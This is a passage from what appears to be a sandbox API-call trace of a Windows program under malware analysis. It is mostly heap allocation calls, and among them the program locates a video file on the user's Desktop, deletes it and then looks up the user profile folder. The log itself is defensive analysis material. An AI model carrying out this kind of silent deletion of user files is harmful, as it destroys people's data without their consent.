hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.483] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0190.484] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.485] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.486] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.486] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.486] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0190.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.487] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0190.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0190.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.487] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.487] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c948 [0190.489] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/yvFiHqzM6fmTt.flv", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yvFiHqzM6fmTt.flv", lpFilePart=0x8bedfc*="yvFiHqzM6fmTt.flv") returned 0x37 [0190.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0190.489] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yvFiHqzM6fmTt.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yvfihqzm6fmtt.flv")) returned 0x20 [0190.489] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yvFiHqzM6fmTt.flv", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40ab1f10, ftCreationTime.dwHighDateTime=0x1d4d0ed, ftLastAccessTime.dwLowDateTime=0x2ebd11d0, ftLastAccessTime.dwHighDateTime=0x1d4cc80, ftLastWriteTime.dwLowDateTime=0x2ebd11d0, ftLastWriteTime.dwHighDateTime=0x1d4cc80, nFileSizeHigh=0x0, nFileSizeLow=0xbeb2, dwReserved0=0x8d, dwReserved1=0x4, cFileName="yvFiHqzM6fmTt.flv", cAlternateFileName="YVFIHQ~1.FLV")) returned 0xaa58a0 [0190.489] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yvFiHqzM6fmTt.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yvfihqzm6fmtt.flv")) returned 1 [0190.490] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40ab1f10, ftCreationTime.dwHighDateTime=0x1d4d0ed, ftLastAccessTime.dwLowDateTime=0x2ebd11d0, ftLastAccessTime.dwHighDateTime=0x1d4cc80, ftLastWriteTime.dwLowDateTime=0x2ebd11d0, ftLastWriteTime.dwHighDateTime=0x1d4cc80, nFileSizeHigh=0x0, nFileSizeLow=0xbeb2, dwReserved0=0x8d, dwReserved1=0x4, cFileName="yvFiHqzM6fmTt.flv", cAlternateFileName="YVFIHQ~1.FLV")) returned 0 [0190.490] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0190.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.490] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0190.491] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.491] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0190.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0190.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0190.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c948 [0190.493] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/yvFiHqzM6fmTt.flv", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yvFiHqzM6fmTt.flv", lpFilePart=0x8bf658*="yvFiHqzM6fmTt.flv") returned 0x37 [0190.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0190.493] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yvFiHqzM6fmTt.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yvfihqzm6fmtt.flv")) returned 0xffffffff [0190.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.494] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0190.494] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d720 | out: hHeap=0x25c0000) returned 1 [0190.494] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0190.494] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0190.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.494] CharUpperBuffW (in: lpsz="A4B00E03609", cchLength=0xb | out: lpsz="A4B00E03609") returned 0xb [0190.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0190.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0190.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0190.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0190.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.495] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0190.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0190.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.495] 